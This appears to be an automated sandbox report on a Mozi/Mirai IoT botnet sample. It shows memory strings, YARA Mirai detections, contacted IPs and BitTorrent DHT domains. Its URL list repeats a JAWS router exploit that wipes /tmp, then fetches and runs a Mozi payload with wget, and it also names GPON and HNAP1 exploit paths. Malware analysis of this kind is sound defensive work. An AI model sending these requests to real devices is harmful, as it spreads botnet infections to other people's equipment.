Source: /tmp/Mozi.m.3 (PID: 5234) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.12.dr Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.12.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm.sh.12.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.12.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.12.dr Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: Gx86_64/usr/bin/qemu-arm/tmp/Mozi.m.3SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.3
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_args () {
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.12.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.12.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.12.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.12.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm.sh.12.dr Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate qemu -append arguments
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.12.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.12.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh2.12.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: kvm.sh.12.dr Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.12.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.12.dr Binary or memory string: identify_qemu () {
Source: parse-console.sh.12.dr Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.12.dr Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.12.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.12.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.12.dr Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.12.dr Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: functions.sh2.12.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.12.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.12.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
Source: kvm-test-1-run.sh.12.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: functions.sh2.12.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.12.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.12.dr Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.12.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: functions.sh2.12.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.12.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.12.dr Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.12.dr Binary or memory string: qemu-system-i386)
Source: functions.sh2.12.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.12.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.12.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.12.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.12.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.12.dr Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.12.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.12.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh2.12.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.12.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.12.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.12.dr Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.12.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.12.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.12.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.12.dr Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: Mozi.m.3, type: SAMPLE
Source: Yara match File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match File source: Mozi.m.3, type: SAMPLE
Source: Yara match File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
124.109.183.90
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
117.207.90.45
 unknown India
9829 BSNL-NIBNationalInternetBackboneIN false
94.149.105.110
 unknown Denmark
9158 TELENOR_DANMARK_ASDK false
185.239.176.62
 unknown Iraq
204798 MaxLinkCompanyLtdIQ false
37.133.231.78
 unknown Spain
12479 UNI2-ASES false
208.252.73.84
 unknown United States
4208 THE-ISERV-COMPANYUS false
91.6.191.105
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
130.114.149.2
 unknown United States
1467 DNIC-ASBLK-01467-01468US false
24.219.254.49
 unknown United States
8092 AMHUS false
39.99.69.81
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
1.185.181.124
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
208.115.182.29
 unknown United States
22968 MIAMI-UNIVERSITYUS false
113.129.113.246
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
135.192.237.245
 unknown United States
14962 NCR-252US false
67.148.51.196
 unknown United States
3910 CENTURYLINK-EUROPE-LEGACY-QWESTUS false
145.55.9.226
 unknown United Kingdom
1103 SURFNET-NLSURFnetTheNetherlandsNL false
143.49.171.154
 unknown United States
13748 CSHLUS false
44.87.205.17
 unknown United States
7377 UCSDUS false
218.72.91.66
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
23.11.203.232
 unknown United States
20940 AKAMAI-ASN1EU false
53.248.69.159
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
98.245.32.216
 unknown United States
7922 COMCAST-7922US false
80.59.253.0
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
147.16.72.64
 unknown United States
10796 TWC-10796-MIDWESTUS false
4.171.59.186
 unknown United States
3356 LEVEL3US false
37.78.209.154
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
142.94.252.227
 unknown Canada
393952 GOANETCA false
124.13.95.167
 unknown Malaysia
4788 TMNET-AS-APTMNetInternetServiceProviderMY false
86.15.234.71
 unknown United Kingdom
5089 NTLGB false
162.4.117.204
 unknown unknown
35893 ACPCA false
57.219.0.139
 unknown Belgium
2686 ATGS-MMD-ASUS false
159.229.74.191
 unknown United States
13188 TRIOLANUA false
69.103.186.241
 unknown United States
4261 BLUEGRASSNETUS false
124.225.149.1
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
41.29.160.34
 unknown South Africa
29975 VODACOM-ZA false
6.11.213.232
 unknown United States
668 DNIC-AS-00668US false
149.196.235.159
 unknown United Kingdom
8386 KOCNETTR false
139.112.91.231
 unknown Norway
5619 EVRY-NO false
170.145.194.147
 unknown United States
2048 LANET-1US false
16.76.8.99
 unknown United States
unknown unknown false
204.180.37.241
 unknown United States
1239 SPRINTLINKUS false
48.63.209.77
 unknown United States
2686 ATGS-MMD-ASUS false
154.123.11.110
 unknown Kenya
12455 JAMBONETKE false
204.228.101.40
 unknown United States
30136 AD12US false
95.179.227.24
 unknown Netherlands
20473 AS-CHOOPAUS false
222.196.0.53
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
154.62.137.64
 unknown United States
174 COGENT-174US false
44.53.23.174
 unknown United States
7377 UCSDUS false
172.206.179.220
 unknown United States
18747 IFX18747US false
175.244.101.90
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
163.8.68.103
 unknown Australia
45589 ENERGYAUST-ASAUSGRIDAU false
68.136.209.119
 unknown United States
23148 TERRENAPUS false
35.60.164.149
 unknown United States
36375 UMICH-AS-5US false
202.222.4.253
 unknown Japan 10010 TOKAITOKAICommunicationsCorporationJP false
166.106.1.246
 unknown unknown
9321 HYUNET-ASHanyangUniversityKR false
104.100.148.229
 unknown United States
9443 VOCUS-RETAIL-AUVocusRetailAU false
177.249.12.60
 unknown Mexico
13999 MegaCableSAdeCVMX false
39.147.161.154
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
43.126.201.126
 unknown Japan 4249 LILLY-ASUS false
182.170.213.106
 unknown Japan 2527 SO-NETSo-netEntertainmentCorporationJP false
167.110.204.224
 unknown United States
6057 AdministracionNacionaldeTelecomunicacionesUY false
220.71.153.167
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
142.78.223.105
 unknown Canada
2665 CDAGOVNCA false
218.39.19.65
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
95.240.239.88
 unknown Italy
3269 ASN-IBSNAZIT false
35.89.206.91
 unknown United States
237 MERIT-AS-14US false
53.114.83.124
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
173.94.112.119
 unknown United States
11426 TWC-11426-CAROLINASUS false
164.251.226.208
 unknown United States
5972 DNIC-ASBLK-05800-06055US false
60.50.120.207
 unknown Malaysia
4788 TMNET-AS-APTMNetInternetServiceProviderMY false
62.111.242.61
 unknown Poland
12741 AS-NETIAWarszawa02-822PL false
23.232.144.253
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
185.79.226.70
 unknown Portugal
41962 MGONCALVESPT false
47.85.193.136
 unknown United States
3209 VODANETInternationalIP-BackboneofVodafoneDE false
149.31.223.0
 unknown United States
27616 AS-NEWSCHOOLUS false
156.4.225.43
 unknown United States
29975 VODACOM-ZA false
205.4.238.39
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
11.230.142.52
 unknown United States
3356 LEVEL3US false
40.91.248.26
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
130.68.103.209
 unknown United States
205 MONTCLAIR-ASUS false
205.95.125.90
 unknown United States
647 DNIC-ASBLK-00616-00665US false
32.174.73.232
 unknown United States
2686 ATGS-MMD-ASUS false
4.110.94.140
 unknown United States
3356 LEVEL3US false
185.8.253.105
 unknown France
8399 SEWAN-FR false
20.238.169.86
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
220.205.132.232
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
16.65.114.156
 unknown United States
unknown unknown false
211.4.101.192
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
217.232.11.98
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
165.41.240.146
 unknown United States
37053 RSAWEB-ASZA false
194.97.213.242
 unknown Germany
5430 FREENETDEfreenetDatenkommunikationsGmbHDE false
173.167.216.78
 unknown United States
7922 COMCAST-7922US false
103.59.2.142
 unknown India
9829 BSNL-NIBNationalInternetBackboneIN false
152.114.122.105
 unknown United Kingdom
29295 NPSGB false
135.26.138.61
 unknown United States
13333 CCI-PA-AS-1US false
34.186.100.193
 unknown United States
2686 ATGS-MMD-ASUS false
93.13.215.74
 unknown France
15557 LDCOMNETFR false
39.38.182.96
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK false
198.145.227.220
 unknown United States
2044 IINET-2044US false
169.137.244.247
 unknown United States
13433 COXNETUS false

Contacted Domains

Name IP Active
dht.transmissionbt.com 87.98.162.88 true
bttracker.acc.umu.se 130.239.18.158 true
router.bittorrent.com 67.215.246.10 true
router.utorrent.com 82.221.103.244 true
bttracker.debian.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://13.35.5.125:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://154.93.41.99:37215/ctrlt/DeviceUpgrade_1 false
  • Avira URL Cloud: safe
 unknown
http://87.17.124.195:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://154.209.180.104:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://171.25.175.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://23.44.16.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://205.198.160.107:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://1.9.218.126:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://23.58.36.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://127.0.0.1:80/GponForm/diag_Form?images/ true
  • Avira URL Cloud: safe
 unknown
http://23.6.123.60:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/ true
  • Avira URL Cloud: safe
 unknown
http://114.142.213.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://121.151.98.14:80/HNAP1/ false
  • Avira URL Cloud: safe
 unknown
http://178.32.54.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://81.108.37.251:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://104.25.119.143:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://188.215.82.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://148.229.1.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://54.173.33.241:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://93.41.229.147:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://162.209.132.128:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://186.219.131.213:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://23.57.42.173:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://23.1.122.127:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown